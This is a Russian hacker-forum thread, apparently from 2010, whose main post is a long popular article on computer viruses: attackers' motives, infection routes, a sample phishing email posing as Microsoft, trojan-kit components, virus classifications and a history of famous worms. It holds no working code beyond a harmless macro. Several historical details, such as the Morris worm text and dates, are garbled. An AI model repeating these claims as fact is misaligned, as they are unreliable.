Форум   Статьи   Новости   Файлы   Bugtraq   Сниффер   Друзья   О Клубе
Вернуться   HPC / OFF / Оффтоп / За чашечкой чая
 
  Страница 1
  , 18:26   #1
Banned
 
Локация: Россия,Москва
Регистрация: 27.12.2009
Сообщений: 2,941

Репутация: 0 / 0
По умолчанию Обсуждение темы: ВИРУСЫ: ОПИСАНИЕ,ИХ ЗНАЧЕНИЕ

Обсуждаем эту тему!!!!


Жду ваших вопросов,комментариев,жалоб,критики,замечаний и пожеланий!!!!

Добавлено через 6 часов 33 минуты
Что, никто ничего не хочет сказать?:92::disguise:
__________________
[B][I][FONT="Book Antiqua"][COLOR="Gray"][URL="https://hacker-pro.net/showthread.php?t=13237"]Сила[/URL] - не показывать то,что ты сильней...[/COLOR][/FONT][/I][/B]
[COLOR="Red"][FONT="Comic Sans MS"]Комплексная защита от вирусов[/FONT][/COLOR] [B][FONT="Georgia"]by[/FONT][/B] [COLOR="Blue"][FONT="Comic Sans MS"]Alexfedoruk[/FONT][/COLOR] - [URL="https://hacker-pro.net/downloads.php?do=file&id=3375"][COLOR="Magenta"][U][FONT="Georgia"]ЗДЕСЬ[/FONT] [/U][/COLOR][/URL]

Последний раз редактировалось alexfedoruk; 16.06.2010 в 18:26. Причина: Добавлено сообщение
Пользователь вне форума    
Наши Спонсоры
  , 18:30   #2
Новичок
 
Аватар для 51region
 
Регистрация: 10.06.2010
Сообщений: 28

Репутация: 2 / 0
По умолчанию Re: Обсуждение темы: ВИРУСЫ: ОПИСАНИЕ,ИХ ЗНАЧЕНИЕ

}{очу, на мои пока антивирус молчит.
А за статью спасибо!
__________________
Чтобы спасти Россию, нужно сжечь Москву (М.И.Кутузов)
Пользователь вне форума    
  , 18:43   #3
Banned
 
Регистрация: 10.10.2009
Сообщений: 630

Репутация: 5 / 0
По умолчанию Re: Известные вирусы и их действия

В этой статье я хотел бы поведать вам о самых известнейших вирусах, как все начиналось, их действиях и убытки от их
атак, также вы узнаете много нового о вирусных технологиях, если вы, конечно не вирусолог или вирусмэйкер >. Поехали!

[Вирус - что, где, как, кто?]

Вирус. Некоторые пользователи даже не имеют представления, что именно это и откудо оно взялось и для чего предназначено.
Для них вирус - это, что то, что выше их понимания, это, что-то вроде биологической бактерии, да и понять выражение
"Автор вируса" - не в их силах. Но таким пользователям я открою глаза на правду. Вирус - это творение злого гения
- VX-мэйкера (вирусмэйкера), и это далеко не биологическая болезнь важего жесткого диска, процессора, кредитной
карточки и т.д, это - обычная (кстати, далеко необычная, и это я докажу в этой статье!)компьютерная программа.
Итак, компьютерные вирусы, получили себе такое название, т.к они очень похожи на биологические с точки зрения:

- Среды размножения.
Биологические вирусы заражают биологические – живые организмы, а компьютерные вирусы - компьютер

- Размножения.
Цель биологического вируса - найти и заразить, а компьютерного - тоже... Скорей слово "найти" не подойдет, он заражет
первых попавшихся, вот, например, компьютерный вирус заразил компьютер Пети, a у Пети была записаня книга в Outlook
Express и вирус разослал себя на имеющиеся email-адреса, заразив других

- И других факторов.
Я думаю, если взять школьный учебник по биологии про биологические вирусы (его будет достаточно ))) и дочитать
эту статью, то поймете, что сравнений будет море.

Ты, наверное, хочешь спросить у меня "А зачем вирусмэйкерам это надо? Им что, нравится разрушение чужих ПК???"
К сожалению, некоторым - да, (тому пример известнешего вируса Win95.CIH, который мы рассмотрим позже в этой статье)
но деструктивное предназначение вируса на сегодняшний день давно в прошлом, сегодня вируса наносят вред не именно
вашему ПК - самому железу, а вред информации. Под информацией я не подразумеваю файлы. Итак, для чего же сегодня
вирусмэйкеры пишут вирусы?
Для:

1) Проведения DDoS-атак на крупные серверы
DDoS (Distributed Denial of Service) - "Распределенная атака в обслуживании", предназначены для того, чтобы вывести
какой-либо сервер из строя, например, какой-нибудь фирме "Фирма ABC" невыгодно, чтобы сайт фирмы "Фирма DEF" не
работал четыре часа. Фирма ABC связывается с вирусмэйкером (или хакером) Петей. Петя созывает свой 400 тысяный ботнет
(ботнет - это сеть зараженных компьютеров с помощью червя Пети, может исчисляться тысячами или миллионами, в нашем
случае Петя заразил 400 000 компьютеров, создав свой ботнет), отдает ботам (боты – зараженные машины чевем Пети, они
же и составляют ботнет) команду на флудинг (флудинг - атака, осуществляемая при помои отсылки каких-либо пакетов,
допустим ICMP, для остановки чего либо). Все. Сервер не работает, Петя пьет пивко, а на его Web Money-кошелек тикают
довольно-таки немаленькие деньги...

o--------// Самые известные DDoS-атаки: ("Самые мощные DDoS/DoS-атаки" Журнал "Хакер". URL: www.xakep.ru):
Теперь ты знаешь, что собой представляет атака на отказ в обслуживании. Пришло время составить небольшой хит-парад
DoS/DDoS-атак

- Пожалуй, самой нашумевшей атакой из разряда DoS стала атака на корневые DNS-сервера, произошедшая в ноябре 2002 года.
Тогда распределенной атаке подверглись все 13 DNS-серверов, семь из которых вышли из строя. Только высокий уровень
избыточности в структуре интернета позволил избежать задержек при обращении к ресурсам.

- Атака на сайт SCO, совершенная при помощи вируса MyDoom и всех его подцепивших.
22 августа 2003 года сайт компании SCO перестал отвечать на запросы пользователей. Атака продолжалась несколько дней
и прекратилась только 25 августа. Поскольку вирус MyDoom имел очень широкое распространение, то атака получилась
мощнейшей. Вторая редакция вируса MyDoom.B (о Mydoom мы поговрим в этой статье - примечание 1nf3ct0r'a), созданная
для атаки на сайт Microsoft, не имела такого "успеха" у пользователей.

- Серверы Osirusoft крупнейшего хранилища IP-адресов, замеченных в спаме, были отключены после
большого количества распределенных атак на отказ в обслуживании. Данная служба занималась ведением динамического
списка IP-адресов, замеченных в спаме.

По сравнению со следующими видами деятельности вирус-мэйкеров, бизнесс DDoS-атак - цветики

2) Получение паролей, секретной информации, взлом банков и т.д
Довольно часто в вирусы встроенны:
- перхватчики паролей
- программы, для организации плацдарма прокси-серверов на Вашем компьютере
(то есть, хакер сможет взламывать, допустим сервер NASA от вашего имени, точнее IP-адресса, по которому найти
человека - как два байта переслать )
- функции открытия бэкдора на Вашем ПК (бэкдор - это своего рода "потайной ход". Открывается какой-либо порт на вашем
ПК, допустим, 31337. Затем в любой момент, когда вы в интерете он может проникнуть в Ваш компьютер и обладать
неограниченной свободой действия! Все - от просмотра и чтения файлов, до запуска и удаления)
- клавиатурный шпион, так называемый "кейлоггер", который будет следить за всеми нажатыми клавишами на Вашем компьютере
- и другие функции
Так вирусмэйкеры могут стащить, допустим, базу данных с кредитными картами и паролями, пароль от Вашего WM-кошелька,
и многое, многое другое и т.д Только представить - хакер, заразивший машину NASA может украсть все исследования и
продать в ненадежные источники - это действительно так! Угроза очень велика - я вам еще докажу в этой статье, докажу!!!

- Рассылка ненавистного спама
Без комментариев * звучат крики "Фууу!"

Рассказывать полностью "Зачем же им это" у меня не хватит ни сил, ни желания . Но общую картину - основу их действий
и о происходящем вы уже имеете - "Атака на информацию" ;) Ну чтож, а как же вирус может попасть на наш компьютер?
Теперь рассмотрим методы проникновения вируса в Ваш компьютер:

- Файл с любого носителя инормации (дискета, болванка, HDD)
Огромное колчичество вирусов имеет функцию "вписывания" в код какого-то файла свой код, тем самым расползаясь по всему
HDD (жесткому диску). Например, у Васи вирус полностью заразил все файлы, а добрый Вася хотел дать соседу хакеру Пете
новую серию Масяни . Петя запустил и заразился. Или наоборот, у злого хакера Пети почти закончился интернет - осталось
300Кб, за интернет картой оплаты дорожайшего траффика идти было лень и Петя решил впарить Васе троян (троянский конь,
о нем мы поговорим далее). Петя имел последнюю всерию Масяни и очень удобный троян, предварительно его настроив, затем
склеив серверную часть трояна с масяней, с помощью джонейра (программа, умеющая скреплять файлы) и дал доброму Васе.
Вася обрадовался и очень благодарил своего "друга" Петю, даже не зная какой он злой, а во время просмотра серии - на
E-mail Пети отправились все пароли Васи :(

- Файл, скаченный из интернета
Ха! И рассказывать не надо. Достаточно зайти на главную страницу сайта и ты уже заражен (об этом тоже позже ).
Часто за крэками к какому-либо софта прячутся наглые вирусы или трояны, особенно часто - порно сайты, программы для
генерации паролей карточек БиЛайна и т.д. Очень рекомендую скачивать файлы только с проверенных, авторитетных сайтов

- Эллектронная почта
Но это довольно таки популярный способ распространения вирусов, но не совсем оптимальный и продуманный.
Живой тому пример вирус "I-LOVE-YOU" (о нем тоже позже, также известен как LoveLetter.vbs), который распространялся
по электронной почте с темой "Я тебя люблю". Конечно, успех был огромный - молодым пользователям кто-то "признавался
в любви", а они с удовольствием открывали письмо и т.д. Признание в любви почтового червя - не очень то романтично

- Простой заход в интернет

Наконец, я внушил Вам страх .О последнем расскажу подробнее, точнее о испытании ребят из компании HoneyNet, которые
довооольно часто рассказывают грустные вещи юзерам о хакерах, вирусах и им подобным:
Вобщем, как я уже сказал ребята из Honeynet решили провести очередной экспиремент - им выделили несколько
компьюетров, которые мониторились очень, очень, очень и очень тщательно. Подключили их к интернету.
Результат был сногсшибательным - первый компьютер был заражен менее чем за 10 секунд, а самый последний через несколько
минут. О чем тут теперь говорить??? На эту тему мы еще с Вами поразмыслим, но чуть позже, когда я расскажу намного
больше интересной информации... Итак, мы разобрались как размножаются, теперь какими методами проникают:

- Вирусы, которые распространяются при помощи пользователей ;)

>Социальная инженерия
Для того чтобы обладать навками социальной инженерии - не надо быть ни инженером, ни программистом. Надо быть хитрым.
Вот, например про вирус "I-LOVE-YOU" ("я тебя люблю", который ) - он завлекал юзеров тем, чтобы они хотели его
открыть. Задача такая - сказать юзеру такое, чтобы его глаза загорелись и он очень, очень хотел его открыть.
Довольно часто появляются письма типа (письмо надо писать очень убедительно, в отличии от моего, наскоро написанного ):

0---------// Subject: EXEC ATTACH TO UPDATE YOUR SYSTEM!
Здравствуйте, мы компания Microsoft. Пояился новый вирус - ужассссс! После заражения компьютера - расползается по
комнате! Вам, как зарегистрированному пользователю прилагается программа, после запуска которой - вам не будет
страшн этот вирус. До свидания
P.S: Обязательно скачайте файл из аттача и запустите!!!
o----------------------------//..................
Ну тут фантазии много. Пользователя можно заставить запустить (точнее соблазнить запустить ) файл и через ICQ и т.д.
Итак, благодаря социальной инженерии люди сами могут помочь вирусу размножиться. Но на сегодняшний день даже маого
ушастого чайника не так легко заставить запуститьаттач email'a. Поэтому пойдем дальше...

>Зараженные файлы.
Как я уже говорил раньше - вирусы могут заражать все файлы на Вашем HDD, вирусы проделовавшие такую работу называются
Parasitic-вирусами. Способ рапространения мы уже тоже смотрели выше, но я его скопирую сюда:
... расползаясь по всему HDD (жесткому диску). Например, у Васи вирус полностью заразил все файлы, а добрый Вася хотел
дать соседу хакеру Пете новую серию Масяни . Петя запустил и заразился. Или наоборот, у злого хакера Пети почти
закончился интернет - осталось 300Кб, за интернет картой оплаты дорожайшего траффика идти было лень и Петя решил
впарить Васе троян (троянский конь, о нем мы поговорим далее). Петя имел последнюю всерию Масяни и очень удобный
троян, предварительно его настроив, затем склеив серверную часть трояна с масяней, с помощью джонейра (программа,
умеющая скреплять файлы) и дал доброму Васе. Вася обрадовался и очень благодарил своего "друга" Петю, даже
не зная какой он злой, а во время просмотра серии - на E-mail Пети отправились все пароли Васи :(

- Вирусы, распространяющийеся без участия человека или вирусы, размножающиеся
благодаря ошибкам в программном обеспечении (далее ПО)
Эти вирусы самые опасные. О них я говорил выше и о опыте HoneyNet, который, я надеюсь Вас впечатлил

>Вирусы, распространяющиеся с помощью багов в браузерах
Вирусы, распространящиеся благодаря браузерам - отличное решение. Какой самый популярный браузер? Да, Internet Explorer
(далее IE). Так вот, IE на самом деле очень "дыряв" в плане безопасности. Эксплойт понятие знакомое? Баг? Ну все по
порядку (статью же читают не только хакеры? ) Баг - это какая-то ошибка в программе, которая может
предоставить что-то. В эксплойтах используются какие-то баги (ошибки) благодря которым можно взломать систему
- повысить привелегии до администрторских или получить доступ к командному интерператору - выполнять команды
(получить шелл). Итак, у нас есть эксплойт для IE удаленного выполнения команд, благодаря которому зайдя на главную
страницу какого-то сайта юзер заразится с помощью того, что ошибка в IE позволяла выполнять команду на ПК пользователя,
и командазапустила EXE'шник вируса. Вот и все! Кстати очень популярно – взлом популярных сайтов (хотя бы 400 посетителей
в день) и проделка с его главной страницей такую жуткую вещь

>Вирус, распространяющиеся при помощи бага в другом софте:
О баге в RPC DCOM:
Одной из самых опасных уязвимостей на сегодняшний день является переполнение буфера (buffer overflow). Сейчас я говорю
о дыре в RPC DCOM - об этой уязвимости узнали 16 июля 2003 года (вроде как). Самое интересное было в том, что на момент
выхода эксплойта (а он появился почти сразу после того, как стала известна уязвимость) не блыо НИКАКОЙ заплатки. Все
сервис паки были уязвимы (А уязвимы были windows2000 (все поголовно), windows XP c SP1, SP0). Но это еще полбеды.
Самый ужас пришел тогда, когда был запущен MSBlast (Кстати, вирус MSBlast получал привелегии system, что на порядок
выше привлегий администратора! Об этом позже ). От атак не было отбоя. Систему можно было взломать просто запустив
програму и введя IP-адрес ПК, который надо взломать. Взломам небыло отбоя.
Так вот. Злой хакер Петя говорил с добрым Васей по ICQ. Вася был администртором интернет-магазина и срубал огромные
деньги, но хакер Петя тоже не дремал. Вчера услышал о хитовой уязвимости, пока Вася был в отпуске. Петя скачал эксплойт,
откомпилировал его и узнав у Васин IP, стырил его WM-кошелк и пассы от магазина, написав продвинутый троян :(
Так вот. Допустим в вирус встроена автоматическая функция, которая бы сама взламывала компьютеры, просто "доставая"
IP-адресса? Это еще ерунда. Итак, допустим хакер нашел очень, очень, очень страшную уязвимость, написал эксплойт и...
и никому не сказал о ней (решил сам пользоваться , а так как 6 ноября 2003 — Microsoft объявляет награду в 5 млн USD
за поимку хакеров, использовавших уязвимости в выпущенных компанией программах - не спешит рассказывать никому ) и
взламывает все системы подряд, а в конце концов написал червя и смог покорить все компьютеры? Это будет незаметно...
Вирус просто сидит в памяти и делает свое грязно дело, даже не намекая на себя пользователю? И Вы думаете, что во всем
мире такого хакера нет? Который написал червя и нашел такой огромный баг? Конечно есть! Так, что практически все мы
заражены, увы :| - и не вздумайте отнекиваться – я уверен Два вида ошибок, благодаря которым можно узнать об атаке
на Ваш компьютер эксплойтом для RPC DCOM (защита от сплойта – установка Windows SP2):



















[Классификации вирусов]

Итак, теперь рассмотрим классификации вирусов. Вирус может быть:

· Резидентный
Такие вирусы заражают все, что запускает пользователь. Получили они себе такое названия из-зи термина ОС DOS –
TSR (“Terminete and Stay Rsident” - так вроде). Отличает их довольно таки маленький размер - от 1 до максимального 4 Kb.
Для написания таких вирусов в основном используется Assembler. Ведь такой зверек должен быть маленьким и неприметным.
Все они действуют по разному:
- просто прячутся в файлах, причем очень часто в EVIROINMENT и также в свободных участках памяти
- подобно загрузочным – сидят в оперативной памяти.
- Используют MCB (Memory Control Block), используемый в ОС DOS
Резидентный вирус отличается от простой резидентной программы лишь тем, что он умеют размножаться сами по себе,
построить его можно по схеме обычной TSR-программы

· Загрузочный
Загрузочные вирусы довольно часто имеют в себе функции резидентных вирусов. Полчили они такое название из-за того,
что они загружаются раньше операционной системы (ОС). Отличает:
- Как я уже сказал, загружаются раньше ОС, т.е в первых секторах “носителей информации” (диск, дискета)
- Часто также как и резидентные прячутся в MCB-блоках
- Прячутся в памяти – не видимы в процессах
Загрузочные вирусы имеют очень большие недостатки: во-первых, ограниченые возможности (загрузочный т.к), во-вторых,
то, что дискета в флоппи-приводе торчит не все время

· Файловый
Эти вирусы – вирусы, использующие файловую систему для чего-либо. Большая часть вирусов – файловые – они заражают
исполняемы файлы, такие как COM и EXE, причес EXE – чаще всего . Алгоритмов для заражения существует огромное
количичество – но все они сводятся к одному.

· Макровирус
Макровирус – ничто иное, как вирус заражающий текстовые файлы (*.txt, *doc и т.д), также часто заражают *.bat-файлы.
В свое время они были очень популярны, и действительно, все антивирусы в то время были нацелены на исполняемые файлы,
COM и EXE, а тут бац! И текстовые документы…
Они сполняются как программы, используемые такими интепретаторами как mail-script и basic. Итак, что такое макрос?
Макрос - это программа, написанная на Visual Basic. Cинтаксис:
# Sub имя_макроса
# код_макроса
# End Sub

Вот, для примера я написал крутой макрос:

# Sub infectors_macros
# MsgBox ".::My_Macr0virus.1nf3ct0r.a ;)::."
# ‘Оператор MsgBox выводит сообщение
# End Sub

· Полиморфики. Пермутационные вирусы. Шифрованные
Вирусы из разряда особо опасных. Сделаны они таким образом, что могут “мутироваться” – постянно модифицировать свой код,
заменяя команды процессора похожими. Пермутацию мы рассмотрим чуть ниже. Шифрованые вирусы очень тяжело убить.
О них тоже ниже

· Стэлс-вирус
К этому разряду можно отнести большое количество вирусов, использующих стелс-технологии (Stealth – невидимость), например,
перехваты API-функций. О стелс технологиях мы поговорим ниже. Стелс-вирусы – разновидность резидентных вирусов.
Спрятавшись в оперативной памяти, вирус перехватывает прерывания DOS. Действует по алгоритму:
1. При открытии файла проверят заражен или нет.
2. Если заражен, то он его лечит, чтобы антивирус не нашел его
3. Если не заражен, то заражает

· Сетевой
Сетевые вирусы – это те, которые распространяются с помощью:
- локальной сети
- интернета
- других сетей
На данный момент это самый популярный вид вируов. Вирусов – червей (о них нам еще много, много еще предстоит узнать)
В ходе рассказов вы поймете как они действуют. Особенно подробно будет написано в “Анатомии скользких червей”.

· Псевдо-вирусы

Псевдо вирусы представлят собой “безобидную шутку”, но иногда и обидную. Вот, например, встречал наш “отечественный
вирус”, который при печати документа – вытворял с ним такое: вставлял матерные слова в документ, причем не просто
“в документ”, а “при печати”, то есть документ – нормальный, а распечатка – мама не горюй! Вирус был наделен небольшим
искусственным интеллектом, если можно так сказать – замечая имена и фамили – ставил тире и крыл матом ;). Теперь
о очень обидных: Так называемый вирус “Казино”… Через долгое время после запуска вируса появляется сообщение, мол
“Выйграешь у меня – жесткий диск твой, а не выйграешь – мой, несогласие играть – тоже мой”. После 10 минут игры,
ты конечно проигрываешь, а под похоронный марш форматируется винчестер…

· Троянский конь (трояны)
В принципе, троянский конь достаточно тяжело отнести к вирусам… Но можно. Троянский конь получил себе такое имя
благодаря одной легенде:
Однажды греки для победы над троянцами построили большого деревянного коня, в котором спряталась группа солдат.
Жители Трои решили, что конь – подарок от богов и затащили его в город. К ночи, греческие солдаты вылезли из коня,
открыли воротоа, и армия греков ворволась в город. Эта хитрость осталась и по сей день – пользователи “затаскивают”
троянского коня себе в “дом” – компьютер.

Прежде всего в троянах возможны функции:
- отсылка паролей от emailов, сайтов, интернета, wm-кошельков, ICQ, и т.д на email хакера
- встроенный кейлоггер, записывающий все нажатые клавиши пользователем
- получение доступа к командному интерпретатору
- неограниченые возможности действия с файлами и вообще с системой
- шутки – от разговора с жертвой через троянский сервер, до открывания/зыкрываня CD-ROMa
- и т.д

Вобщем, полный контроль над системой. Я расскажу Вам о трояне, который вертится в публичных источниках
(такие трояны сразу попадают в антивирусные базы, поэтому профессионалы используют приватные трояны, которые
написали либо сами, либо купили у VX-мэйкера). Этот троян – “Lamer’s Death”. Итак, я расскажу, что входит в комплект.



В комплект входит три исполняемых файла:
- Death.exe
Итак, это клиентская часть трояны. С помощью нее мы управляем чужим компьютером.
Как вы видите из “рисунка” – возможности неограниченные. Те, кому еще не страшно – скачайте троян и помотрите
клиентскую часть Death.exe – будите в ужасе, если ниразу не пользовались троянами >

- Editor.exe
Есть эта часть есть не всегда, но часто. Итак, это конфигураторо серверной части (которую мы рассмотрим далее).
В ней хакер настрйвает куда будут отправляться пароли и т.д

- Server.exe
Эта та самая часть, которую подсовывают пользователям, но ее надо настроить с помощью Editor.exe или благодаря ей
– создать новую. Все просто… Это далеко не единственный троян, и далеко не самый эффективный, так как он
имеется в публичных источниках…


Также вирусы можно разделить на:

- EXE-вирусы.
Самые распространенные вирусы – EXE-вирусы. EXE-программы можно разделить на три осноыне типа:
DOS EXE file format – в принципе, разработка исполняемых программ для операционной системы DOS.
NEW EXE (NE) – разработка Microsoft для операционных систем Windows
PORTABLE EXECUTABLE FORMAT (PE) – задумка Microsoft для 32-битных оерационных систем класса Windows
Хочется заметить, что чем более новым стновится формат EXE, тем сложнее становится его структура,
следовательно и заражение будет происходить не так изящно

- DLL-вирусы.
DLL- библиотеки ОС Windows. Довольно часто к этому разряду можно отнести полиморфики и шифрованные вирусы.
DLL-файлы имеют такой же формат, что и у EXE – алгоритмы заражения очень похожи

- COM-вирусы.
COM-файлы состоят только мз одного кода, а размер их не должен превышать 64Kb (~ 65536 байт - размер одного сегмента
DOS). Такие вирусы довольно таки просты по своим алгоритмам.

- LIB-вирусы.
О! Это довольно таки интерсная идея вирусмэйкеров. Как тебе известно, LIB-файлы используются в языках программирования.
Но lib файл не может быть исполнен. Для чего же вирусмэйкеры заражают их? Так вот, LIB-файлы используются для
компиляции – вирусмэйкеры хотят, чтобы код вируса содержался в новой программе, Вот, например компании интернет
пейджерв ICQ попался такой вирус. Все! Вирус заразил LIB-файлы и при компиляции новой версия ICQ в нее внедритя
код вируса!

- JAVA- вирусы.

Такие вирусы написаны на языке Java Script, чаще всего для распространения используется MS Outlook Express.
Червь присылает себя по почте в виде HTML-письма, а в письме содержится вирусный JAVA код.
Такие вирусы встречаются достаточно редко.

- Макро вирусы
Вот о них я уже рассказал

- Overwrite (вирусы, замещающие программный код)
Такие вирусы уже практически вымерли. Вирус записывается поверх программного кода, не сохраняя его. При запуске снова
заражает какой-нибудь файл, затем открывает его и записывет свой код в начале программы, а оригинальный код убивает.

- Parasitic (вирусы, внедряющиеся в программный код)
Такие вирусы пользуются популярностью и сейчас, т.к они незаметны. Их код внедряется в инфицированную программу.
Но отличительная черта такого вируса в том, что файлы, зараженные им очень тяжело лечатся :(

- Companion (вирусы-спутники)
Такие вирусы получили себе название из-за того, что для каждого инфицированного файла, в каталоге создается файл с
вирусным кодом с таким же именем, но расширением COM. Такие вирусы неособо опасны – его убить, как два байта перелсать –
просто удалить COM файл. Но есть и второй вид вирусов спутников – вирусы разможаются примерно таким образом:
Имя инфицированного файла остается старым, а расширение заменяется другим. Далее на на место EXE-файла копируется
вирусный код.

Ну вот я и рассказал тебе о простой классификации вирусов. Если тебе стало интересно и ты захотел узнать больше про
классификации, то тебе я могу посоветовать ениги из разряда “Вирусология” и “Энциклопедия вируслв”, которые ты без
проблем сможешь найти в интернете

[Краткая история развития вирусов]
Самый первый шаг к коапьютерным вирусам был сделан в 1949 году когда ученый Джон фон Науманн разработал теориб по
созданию по созданию “математических само-алгоритмов”. Его теория не подталкнула программистов на создание вирусов,
но была замечена матеамтиками и учеными. В принципе, самый первый саморазмножающийся вирус был сделан учеными
математиками! В научном центре Bell математики играли в “Отбери Место” – создали саморазножающиеся программы и
воровали друг у друга виртульные пространства. Вскоре уже начали появляться первые оффициальные вирусы, не
просто “игры”. В начале семидесятых появился самый первый вирус – вирус Pervading Animal (“Рапространяющееся Животное”).
Но эпидемии вируса небыло – вирус заразил лишь один компьютер, компьютер, на котором он был создан. Во времена Pervading
Animal вирус мог появиться сам по себе – начало 70’ых – время программирования, программисы разрабатывали новые алгоритмы
и в частых случаях, из-за ошибок в прграмме программа могла работать сама по себе – используя системные ресурсы.
Следующим шагом, но уже действительно серьезным стало появление вируса The Creeper. В 1972 году, компания NCSA
разрабатывает небезызвестную утилиту telnet, а уже через два года появился вирус, использующий эту чудную программу,
вирус The Creeper. Creeper представлял довольно-таки большую угрозу для компьютеров и информации, поэтому программисты
разработали “Антивирус” – Reeper, противостоящий вирусу. В конце 70’ых вирусы преобретали огромную популярность.
Самой наиболее популярной жертвой были компьютеры Apple. Но вскоре и IBM получили свое – вирус The Brain. Вирус
был написан пакистанцами для того чтобы “наказать” пиратов (они даже оставили свои данные в вирусе! ). Но
что-то пошло не так и вирус разошелся по всему свету
В 80ых годах уже развивалась сеть ApraNet (Отец сегодняшенго InterNet’a) – это и послужило следующим шагом. В конце
80-ых, а именно 1988 году годов появился самый первый интернет-червь – червь Роберта Морриса, распространяющийся при
помощи бага с переполнением буффера.Червь заразил тысячи компьютеров и практически остановил работу интернета на целый
день! Помимо прочего, червь Morris был, наверное, первой автоматической хакерской утилитой, использовавшей несколько
неисправленных уязвимостей в компьютерах Vax и Sun. Червь Роберта Морриса выводил на экран текст "Lamers Must Die", что
переводится как "Ламеры должны умереть". Так и появился самый первый в мире сетевой червь. А сам Роберт Моррис-младший –
сын известного IT-специалиста Роберта Морриса-старшего, который занимал должность руководителя Национального центра
компьютерной безопасности (NCSC). Червь Морриса проложил путь из под земли к свету другим червям. Собственно, через
год уже появился наш великий InterNet. Вирусы появлились каждый день – но это небыло эпидемией. в 1991 году пявляются
слухи о компьютерном вирусе под названием Michaelangelo, механизмы разрушения в котором активируются 6-го марта. В
середине девяностых стали появляться новые разновидности вирусов. Случаев было много, особенно известен тот, когда
12-летний мальчик поразил своим вирусом компьютеры Белого Дома, а также о том как Microsoft разослала программистам
зараженную вирусом Windows 95. 1998 год можно ознаменовать годом “Борьбы с вирусами”. Огромное количество громких дел,
но все подсудимые отделывались штрафами. Также 98 год ознаменовыается появлением вируса Win95.CIH, который стал первым
компьютерным вирусом, стирающим содержимое flash-памяти BIOS компьютер. CIH стал первым вирусом, который мог испортить
само железо. 1999 год показал всему миру вирусную мощь. Появился сетевой вирус (червь) Melissa, который попродил всемирную
эпидемию. Ущерб от вируса превышал 80 миллионов доллоров. Антивирусные компании получили огромные деньги, а антивирусы
стояли на каждом ПК. Вскоре, а точнее в 2000 году грянула новая волна атак вируса I-LOVE-YOU (который по был написан
школьником! Об этом говорит строка в вирусе “I hate go school” – “я ненавижу ходить в школу” )). Вирус поставил
рекорд в своем распространении – был самым быстым из всех, которые существовали в то время, за всю историю вирусов.
За несколько часов он заразил более миллиона копьюетров во всем мире. Но вскоре вирусмэйкер нашли – это был не
школьник, а студент с Филлиппин . Филлипинскому вирусмэйкеру улбынулась удача – его не привлекли к ответственности,
так как в законах Филиппин не оказалось статьи про компьютерные вирусы. После этого все страны подписали международный
договор, и в каждой стране существует уголовная статья о вредоносном программном обеспечении. Но это не остановило
вирусмэйкеров. Также в июле 2001 появляется известнейший червь – CodeRed, заразивший сотни тысяч компьютеров за
несколько часов. Между 20 и 27 числами каждого месяца включительно червь осуществляет DDoS-атаку на сайт Белого дома
США (whitehouse.gov) . В 2002 году DDoS-атаке вирусов подверглись (об этом рассказывалось выше) 13 DNS-серверов, семь
из которых вышли из строя – а они отвечали за работоспособность интернета. Началась настоящая война – вирусмэйкеры
создавали более продвинутые вирусы, создавая конкуренцию между друг другом – созадвались “вирусы-конкуренты”, которые
убивали чужой вирус и заражали собой. 2003 год стал одним из самых страшных вирусных атак. Червь Slapper за 10 минут
заразил более 80 тысяч компьюетров за 10 минут. Червь проник и в гсоударственные компьютеры США. Америка впала в
отчаяние – выдача виз была невозможна. В июле 2003 года, а именно 16 июля весь мир узнал о баге в RPC DCOM – это
было катастрофа. Уязвимость позволяла взломать любую машину двумя щелчками мыши, в то время – все Windows 2000 и
XP, а точнее все сервис паки – были уязвимы. В первый же день было взломано миллион машин! Но вскоре появился
MSBlast – гроза Microsoft, их разорение и полный дестрой! Червь старательно DDoS’ил www.windowsupdate.com - никто
даже не мог поставить патч на свою ОС! Но на этом Microsoft не останавливалась делать ошибке в своей ОС. Вскоре мир
узнает еще об одной уязвимости – баг в библиотеке ASN.1 (AbstractSyntax Notation One). Появление и этой уязвимости не
привело ни к чему хорошему – опять разорение, взломы, дейстрой. Это были черные деньки Microsoft. Но раз новая хитовая
уязвимость – значит новый хитовый червь. Это был Sasser, втечении нескольких минут заразивший тысячи машин. Появление
червя на компьютере могут доказать симптомы, похожие на червь MSBlast. 2004 год стал эпохой опаснейшего червя MyDoom и
его модификаций. В начале 2004 года был обнаружен опаснейший червь MyDoom.A. Благодаря червяку, производятся атаки на
отказ в обслуживании (DDoS). Червь ищет электронный адреса в Адресной книге Outlook, распространяя файлы с расширением
*.exe, *.src, *.pif, *.zip и других а также в файлах на компьютере с расширениями: .htm, .sht, .php, .asp, .dbx, .tbb,
.adb, .pl, .wab, .txt. После этого червь, используя свой собственный SMTP механизм, рассылает себя по этим адресам. Это,
конечно, не все, что делает червь. До сих пор модификации MyDoom светятся в top20 Касперского и других антивирусов.
Именно благодаря этому червяку и произошли DDoS-атаки на SCO (писалось выше) и Microsoft. Также в 2004-году лидером был
NetSky и другие его модификации, которые поработили миллионы машин во всем мире. 2005 год. Модификация NetSky - NetSky.q
все еще занимает первые места, но вскоре новое молодое семейство червей Mytob выбивает его с лидирования. Червь Mytob
распространяется по эллектронной почте и через баг в локальной подсистеме футентификации пользователей LSASS. А кстати,
на базе программного кода Mydoom построен червь Mytob. Также на сегодняшний день можно выделить таких молодых червей как
Zafi, Bagle и LovGate и звездой ZaToB. К сожалению, история обрывается и я не могу предсказать Вам новой эпидемии моего
червя IT’S-1nf3ct0r’s-J0Ke >. Продолжение следует…
Так… теперь о принципе действия популярных червей.

[Анатомия Скользких Windows червей]

Я подготовил небольшой обзор Windows-червей: Nimda и CodeRed (писал выше). Надеюсь я не зря так старался описать
их действия и Вам понравится .

· IIS-Worm.CodeRed
О эпидемии червя я рассказывал чуть выше и, как Вы поняли, червь заразил огромное количество машин, раз сервер
Белого Дома США вышел из строя из за DDoS-атаки. Также вирус известен под именем “Baby” (Но CodeRed мне больше нравится
). Червь заражает Windows 2000 (без сервис паков), с наличием IIS (Microsoft Internet Information Server), а именно,
червь использует найденную в 2001 году багу в системе IIS. В памяти компьюетра может существовть окло сотни активированных
процессов червя, следовательно это замедляет работу сервера. Microsft быстро среагировала на червя и найденную ошибку и
18 июня 2001 года выпустила заплатку, но леннивые пользователи и администаторы не обновили свою систему.
Главной уникальностью червя является тьо, что он существует в систменой памяти ПК, а также в виде TCP/IP-пакета,
прпеслыая свою копию на удаленные машины – благодаря этому червь и поразил такое большое количество машин. Существуют
и другие побочные эффекты червя, таких как дефейс.
С 20 по 27 числа каждого месяца червь успешно DDoS’ит сайт Белого Дома США – whiehouse.gov.
